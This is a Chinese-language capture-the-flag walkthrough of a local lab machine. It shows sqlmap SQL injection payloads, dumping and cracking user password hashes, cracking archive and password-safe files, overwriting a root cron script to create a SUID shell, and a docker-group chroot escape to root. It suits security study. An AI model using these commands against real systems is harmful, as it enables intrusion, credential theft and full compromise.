信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       (Unknown)
192.168.60.2    00:50:56:e3:f6:57       (Unknown)
192.168.60.158  08:00:27:08:b9:dd       (Unknown)
192.168.60.254  00:50:56:e0:e6:12       (Unknown)

6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.047 seconds (125.06 hosts/sec). 4 responded
❯ export ip=192.168.60.158
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
With RustScan, I scan ports so fast, even my firewall gets whiplash 💨

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.158:22
Open 192.168.60.158:80
Open 192.168.60.158:2222
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-17 16:56 CST
Initiating ARP Ping Scan at 16:56
Scanning 192.168.60.158 [1 port]
Completed ARP Ping Scan at 16:56, 0.14s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:56
Completed Parallel DNS resolution of 1 host. at 16:56, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 16:56
Scanning 192.168.60.158 [3 ports]
Discovered open port 22/tcp on 192.168.60.158
Discovered open port 80/tcp on 192.168.60.158
Discovered open port 2222/tcp on 192.168.60.158
Completed SYN Stealth Scan at 16:56, 0.09s elapsed (3 total ports)
Nmap scan report for 192.168.60.158
Host is up, received arp-response (0.00085s latency).
Scanned at 2025-01-17 16:56:57 CST for 0s

PORT     STATE SERVICE      REASON
22/tcp   open  ssh          syn-ack ttl 64
80/tcp   open  http         syn-ack ttl 63
2222/tcp open  EtherNetIP-1 syn-ack ttl 63
MAC Address: 08:00:27:08:B9:DD (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.55 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

访问80端口，是个跑步的博客

扫一下目录

没什么收获，有个db.php但返回值为0

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.158
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404,403
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/LICENSE.txt          (Status: 200) [Size: 17128]
/README.txt           (Status: 200) [Size: 820]
/about.php            (Status: 200) [Size: 9745]
/assets               (Status: 301) [Size: 317] [--> http://192.168.60.158/assets/]
/db.php               (Status: 200) [Size: 0]
/elements.html        (Status: 200) [Size: 25373]
/images               (Status: 301) [Size: 317] [--> http://192.168.60.158/images/]
/index.php            (Status: 200) [Size: 6178]
/index.php            (Status: 200) [Size: 6178]
/post.php             (Status: 200) [Size: 4395]
/posts.php            (Status: 200) [Size: 5235]
Progress: 23670 / 23675 (99.98%)
===============================================================
Finished
===============================================================

SQL注入

不过我看文章链接会有个?id=

盲猜可以进行SQL注入

sqlmap一把梭，存在时间盲注

❯ sqlmap -u "http://192.168.60.158/post.php?id=1" --batch
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.8.12#stable}
|_ -| . [.]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:15:50 /2025-01-17/

[17:15:50] [INFO] testing connection to the target URL
[17:15:50] [INFO] testing if the target URL content is stable
[17:15:50] [INFO] target URL content is stable
[17:15:50] [INFO] testing if GET parameter 'id' is dynamic
[17:15:50] [INFO] GET parameter 'id' appears to be dynamic
[17:15:50] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable
[17:15:50] [INFO] testing for SQL injection on GET parameter 'id'
[17:15:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:15:51] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="La")
[17:15:51] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[17:15:51] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[17:15:51] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[17:15:51] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[17:15:51] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[17:15:51] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[17:15:51] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[17:15:51] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[17:15:51] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[17:15:51] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[17:15:51] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[17:15:51] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[17:15:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[17:15:51] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[17:15:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[17:15:51] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[17:15:51] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[17:15:51] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[17:15:51] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[17:15:51] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[17:15:51] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[17:15:51] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[17:15:51] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[17:15:51] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[17:15:51] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[17:15:51] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[17:15:51] [INFO] testing 'Generic inline queries'
[17:15:51] [INFO] testing 'MySQL inline queries'
[17:15:51] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[17:15:51] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[17:15:51] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[17:15:51] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[17:15:51] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[17:15:51] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[17:15:51] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[17:16:01] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[17:16:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[17:16:01] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[17:16:01] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[17:16:01] [INFO] target URL appears to have 3 columns in query
[17:16:01] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 77 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 5515=5515

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 4261 FROM (SELECT(SLEEP(5)))Wugi)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-9581 UNION ALL SELECT NULL,NULL,CONCAT(0x71787a7a71,0x7850696a4a77695942616f765453594d66466271666e526a434e5952476969766a7a647367486355,0x7176706a71)-- -
---
[17:16:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[17:16:01] [INFO] fetched data logged to text files under '/home/Pepster/.local/share/sqlmap/output/192.168.60.158'

[*] ending @ 17:16:01 /2025-01-17/

把用户数据库dump下来

❯ sqlmap -u "http://192.168.60.158/post.php?id=1" --batch  -D blog -T users --dump
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.12#stable}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:16:53 /2025-01-17/

[17:16:53] [INFO] resuming back-end DBMS 'mysql'
[17:16:53] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 5515=5515

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 4261 FROM (SELECT(SLEEP(5)))Wugi)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-9581 UNION ALL SELECT NULL,NULL,CONCAT(0x71787a7a71,0x7850696a4a77695942616f765453594d66466271666e526a434e5952476969766a7a647367486355,0x7176706a71)-- -
---
[17:16:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 or 20.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[17:16:53] [INFO] fetching columns for table 'users' in database 'blog'
[17:16:53] [INFO] fetching entries for table 'users' in database 'blog'
[17:16:54] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[17:16:54] [INFO] using hash method 'sha256_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[17:16:54] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[17:16:54] [INFO] starting dictionary-based cracking (sha256_generic_passwd)
[17:16:54] [INFO] starting 4 processes
[17:16:57] [INFO] cracked password 'runner' for user 'david'
Database: blog
Table: users
[3 entries]
+----+---------------------------------------------------------------------------+----------+
| id | password                                                                  | username |
+----+---------------------------------------------------------------------------+----------+
| 1  | 527aa9f431539da8e151d5434d1d5e611d973f601d8e970790882624554146b0 (runner) | david    |
| 2  | 7927e941a969cdf471354e79b7ae29ae25ca04d59f66d6c19f9c43a9367ec498          | maria    |
| 3  | febb36d29baf28da1a00cad0cc6937d49f13738ff9dd88276e7c85920d2bff40          | ian      |
+----+---------------------------------------------------------------------------+----------+

[17:17:00] [INFO] table 'blog.users' dumped to CSV file '/home/Pepster/.local/share/sqlmap/output/192.168.60.158/dump/blog/users.csv'
[17:17:00] [INFO] fetched data logged to text files under '/home/Pepster/.local/share/sqlmap/output/192.168.60.158'

[*] ending @ 17:17:00 /2025-01-17/

用户提权

有个david用户，密码就是runner

222端口连不上，猜测2222端口是docker映射出来的

尝试登入2222端口的ssh

果不其然，该用户存在docker环境中

❯ ssh [email protected] -p 2222
The authenticity of host '[192.168.60.158]:2222 ([192.168.60.158]:2222)' can't be established.
ED25519 key fingerprint is SHA256:0PpHfqtGNxbHeILNpRebyOVMei8/5L6vgtwoUePOZOM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.60.158]:2222' (ED25519) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 6.8.0-49-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Last login: Thu Nov 28 19:37:50 2024 from 192.168.1.17
david@30acf6ca1fb6:~$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.20.0.2  netmask 255.255.0.0  broadcast 172.20.255.255
        ether 02:42:ac:14:00:02  txqueuelen 0  (Ethernet)
        RX packets 366218  bytes 54572501 (54.5 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 316574  bytes 374285100 (374.2 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 534331  bytes 232298078 (232.2 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 534331  bytes 232298078 (232.2 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

家目录下有个隐藏文件，拿到解压密码，得到excel文件

david@30acf6ca1fb6:~$ ls -al
total 28
drwxr-xr-x 4 david david 4096 Nov 28 17:47 .
drwxr-xr-x 1 root  root  4096 Nov 28 17:30 ..
lrwxrwxrwx 1 root  root     9 Nov 28 17:30 .bash_history -> /dev/null
-rw-r--r-- 1 david david  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 david david 3771 Feb 25  2020 .bashrc
drwx------ 2 david david 4096 Nov 28 17:47 .cache
drwxr-xr-x 2 david david 4096 Nov 28 19:36 .hidden
-rw-r--r-- 1 david david  807 Feb 25  2020 .profile
david@30acf6ca1fb6:~$ cd .hidden/
david@30acf6ca1fb6:~/.hidden$ ls
credenciales.zip
------------------分隔------------------
❯ scp -P 2222 [email protected]:.hidden/credenciales.zip .
[email protected]'s password:
credenciales.zip                        100% 4928     1.4MB/s   00:00
~/thl  
❯ zip2john credenciales.zip >hash
ver 2.0 efh 5455 efh 7875 credenciales.zip/credenciales.xlsx PKZIP Encr: TS_chk, cmplen=4728, decmplen=5346, crc=BA8EA891 ts=7424 cs=7424 type=8
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
rockandroll      (credenciales.zip/credenciales.xlsx)
1g 0:00:00:00 DONE (2025-01-17 17:26) 33.33g/s 273066p/s 273066c/s 273066C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
❯ unzip credenciales.zip
Archive:  credenciales.zip
[credenciales.zip] credenciales.xlsx password:
  inflating: credenciales.xlsx

拿到maria用户凭证4br53#j6p78mq#zbvc

定时任务

同时在opt目录下找到备份数据库的脚本

猜测root用户会定时执行

传个pspy64

david@30acf6ca1fb6:/home$ su maria
Password:
maria@30acf6ca1fb6:/opt/scripts$ ls -al
total 12
drwxr-xr-x 2 root root  4096 Dec  2 15:56 .
drwxr-xr-x 1 root root  4096 Nov 28 17:40 ..
-rwxrwx--x 1 root maria  797 Dec  2 15:56 backup.sh
maria@30acf6ca1fb6:/opt/scripts$ cat backup.sh
#!/bin/bash

BACKUP_DIR="/srv/backups"
DB_NAME="blog"
DB_USER="root"
ZIP_PASSWORD="metallica"

BACKUP_FILE="$BACKUP_DIR/blog_backup_$(date +'%Y%m%d%H%M').sql"
/usr/bin/mysqldump -u $DB_USER $DB_NAME > $BACKUP_FILE

zip -P "$ZIP_PASSWORD" "${BACKUP_FILE}.zip" "$BACKUP_FILE"

rm -f "$BACKUP_FILE"

echo "$(date): Backup comprimido de la base de datos '$DB_NAME' creado en ${BACKUP_FILE}.zip" >> /var/log/backup.log

function cleanup_backups {
    local total_backups=$(ls -1t "$BACKUP_DIR"/*.zip 2>/dev/null | wc -l)

    if (( total_backups > 10 )); then
        ls -1t "$BACKUP_DIR"/*.zip | tail -n +11 | while read -r old_backup; do
            rm -f "$old_backup"
            echo "$(date): Backup antiguo eliminado: $old_backup" >> /var/log/backup.log
        done
    fi
}

cleanup_backups


maria@30acf6ca1fb6:/tmp$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░
                   ░           ░ ░
                               ░ ░

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2025/01/17 09:33:01 CMD: UID=0     PID=1118   | /usr/sbin/CRON -f
2025/01/17 09:33:01 CMD: UID=0     PID=1117   | /usr/sbin/CRON -f
2025/01/17 09:33:01 CMD: UID=0     PID=1119   | /bin/sh -c /opt/scripts/backup.sh
2025/01/17 09:33:01 CMD: UID=0     PID=1120   | /bin/bash /opt/scripts/backup.sh
2025/01/17 09:33:01 CMD: UID=0     PID=1121   | /bin/bash /opt/scripts/backup.sh
2025/01/17 09:33:01 CMD: UID=0     PID=1122   | /bin/bash /opt/scripts/backup.sh
2025/01/17 09:33:01 CMD: UID=0     PID=1123   | /bin/bash /opt/scripts/backup.sh
2025/01/17 09:33:01 CMD: UID=0     PID=1124   | /bin/bash /opt/scripts/backup.sh
2025/01/17 09:33:01 CMD: UID=0     PID=1127   | /bin/bash /opt/scripts/backup.sh
2025/01/17 09:33:01 CMD: UID=0     PID=1126   | /bin/bash /opt/scripts/backup.sh
2025/01/17 09:33:01 CMD: UID=0     PID=1125   | /bin/bash /opt/scripts/backup.sh
2025/01/17 09:33:01 CMD: UID=0     PID=1130   | /bin/bash /opt/scripts/backup.sh
2025/01/17 09:33:01 CMD: UID=0     PID=1129   | /bin/bash /opt/scripts/backup.sh
2025/01/17 09:33:01 CMD: UID=0     PID=1128   | /bin/bash /opt/scripts/backup.sh
2025/01/17 09:33:01 CMD: UID=0     PID=1131   | /bin/bash /opt/scripts/backup.sh
2025/01/17 09:33:01 CMD: UID=0     PID=1132   | /bin/bash /opt/scripts/backup.sh

我们拥有对这个脚本的读写执行权限，直接修改文件即可

maria@30acf6ca1fb6:/opt/scripts$ echo -e "cp /bin/bash /tmp/sh\nchmod +s /tmp/sh">backup.sh
maria@30acf6ca1fb6:/opt/scripts$ cat backup.sh
cp /bin/bash /tmp/sh
chmod +s /tmp/sh

2025/01/17 09:37:01 CMD: UID=0     PID=1192   | /usr/sbin/CRON -f
2025/01/17 09:37:01 CMD: UID=0     PID=1191   | /usr/sbin/CRON -f
2025/01/17 09:37:01 CMD: UID=0     PID=1193   | /bin/sh /opt/scripts/backup.sh
2025/01/17 09:37:01 CMD: UID=0     PID=1194   | /bin/sh /opt/scripts/backup.sh
2025/01/17 09:37:01 CMD: UID=0     PID=1195   | chmod +s /tmp/sh
-----------------分隔-------------
maria@30acf6ca1fb6:/tmp$ ./sh -p
sh-5.0# id
uid=1001(maria) gid=1001(maria) euid=0(root) egid=0(root) groups=0(root),1001(maria)
sh-5.0# whoami
root
sh-5.0# cd /root
sh-5.0# ls
TODO_LIST.txt
sh-5.0# cat TODO_LIST.txt
1. Crear un script para automatizar los backups de la base de datos. (OK)
2. Cifrar las contraseñas de la base de datos. (OK)
3. Avisar a Ian para que cambie su contraseña, a ver si deja usar su famosa contraseña "iambatman" en todos lados. (Pendiente)
1. 为数据库备份创建一个自动化脚本。（OK）
2. 对数据库密码进行加密。（OK）
3. 通知Ian更改密码，看看他是否会停止在各处使用他那个著名的密码“iambatman”。 （待定）

发现提示中有个密码

Root提权

尝试ssh连接，连不上，首字母改成小写即可

❯ ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 24.04.1 LTS (GNU/Linux 6.8.0-49-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Fri Jan 17 09:46:47 AM UTC 2025

  System load:  0.11               Processes:               134
  Usage of /:   45.0% of 18.53GB   Users logged in:         0
  Memory usage: 38%                IPv4 address for enp0s3: 192.168.60.158
  Swap usage:   0%

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

Expanded Security Maintenance for Applications is not enabled.

2 updates can be applied immediately.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Thu Nov 28 20:42:23 2024 from 192.168.1.17
ian@TheHackersLabs-Runners:~$ cat user.txt
1927621ad6957f7c5812be72de560fea

再次信息收集，发现用户elliot家目录下存在psafe3文件，而且权限为644

ian@TheHackersLabs-Runners:/home$ cd elliot/
ian@TheHackersLabs-Runners:/home/elliot$ ls -al
total 36
drwxr-xr-x 4 elliot elliot 4096 Nov 28 22:12 .
drwxr-xr-x 4 root   root   4096 Nov 28 13:43 ..
lrwxrwxrwx 1 root   root      9 Nov 28 15:54 .bash_history -> /dev/null
-rw-r--r-- 1 elliot elliot  220 Mar 31  2024 .bash_logout
-rw-r--r-- 1 elliot elliot 3771 Mar 31  2024 .bashrc
drwx------ 3 elliot elliot 4096 Nov 28 21:51 .cache
-rw------- 1 elliot elliot   20 Nov 27 00:06 .lesshst
-rw-r--r-- 1 elliot elliot  904 Nov 28 14:05 miscredenciales.psafe3
-rw-r--r-- 1 elliot elliot  807 Mar 31  2024 .profile
drwx------ 2 elliot elliot 4096 Nov 27 00:05 .ssh
ian@TheHackersLabs-Runners:/home/elliot$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.60.100 - - [17/Jan/2025 10:13:54] "GET /miscredenciales.psafe3 HTTP/1.1" 200 -
------------------分隔--------------------
❯ wget 192.168.60.158:8000/miscredenciales.psafe3
--2025-01-17 18:13:53--  http://192.168.60.158:8000/miscredenciales.psafe3
Connecting to 192.168.60.158:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 904 [application/octet-stream]
Saving to: ‘miscredenciales.psafe3’

miscredenciales.ps 100%[===============>]     904  --.-KB/s    in 0.003s

2025-01-17 18:13:53 (289 KB/s) - ‘miscredenciales.psafe3’ saved [904/904]

❯ pwsafe2john miscredenciales.psafe3 >hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 256/256 AVX2 8x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
metallica        (miscredencial)
1g 0:00:00:00 DONE (2025-01-17 18:15) 5.000g/s 20480p/s 20480c/s 20480C/s 123456..oooooo
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

拿到psafe3的密码metallica

打开密码本，看一下

拿到用户密码HwbE80ZOtZQdkYB，登入一下

ian@TheHackersLabs-Runners:/home/elliot$ su elliot
Password:
elliot@TheHackersLabs-Runners:~$ id
uid=1000(elliot) gid=1000(elliot) groups=1000(elliot),46(plugdev),110(docker)

用户隶属于docker组中，docker提权即可

elliot@TheHackersLabs-Runners:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
Unable to find image 'alpine:latest' locally
latest: Pulling from library/alpine
1f3e46996e29: Pull complete
Digest: sha256:56fa17d2a7e7f168a043a2712e63aed1f8543aeafdcee47c58dcffe38ed51099
Status: Downloaded newer image for alpine:latest
# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
# cat /root/root.txt
5477d00bdb98cf79191def03a598bab6